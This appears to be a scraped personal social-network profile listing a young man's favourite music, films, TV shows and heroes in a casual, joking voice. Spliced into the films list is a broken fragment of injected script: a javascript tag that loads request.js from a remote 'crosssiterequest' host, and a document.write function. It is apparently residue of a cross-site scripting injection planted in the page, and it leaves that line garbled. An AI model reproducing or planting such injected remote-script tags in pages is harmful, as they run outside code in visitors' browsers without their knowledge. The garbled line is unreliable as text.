Movies, music, working out,etc....u get the point. You LIKE!!! LOL!!! This is how you chill at a club!! & This si how you chill in the snow!! (man do I know how to chill or what!!) My Beautiful sis & my cuz!!!
Emperor Montezuma(wait! he's dead) G-LO (A.K.A George Lopez)The midget who played Willow in the movie Willow,and of course my future wife(whoever she is:)).
Heavy Metal, rock or anything that grabs my the way i hate rap
Forrest Gump, The Green Mile, 300, Born in East LA (basically anything thats worth watching)..... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document·write("..1...{}");}..
ESPN, The Simpsons,and my mom's novelas..well at least what i used to watch since i don't have cable anymore...can't affor it
Don't know what a book is..J/k.. anything that grabs my attention
El Chapolin Colorado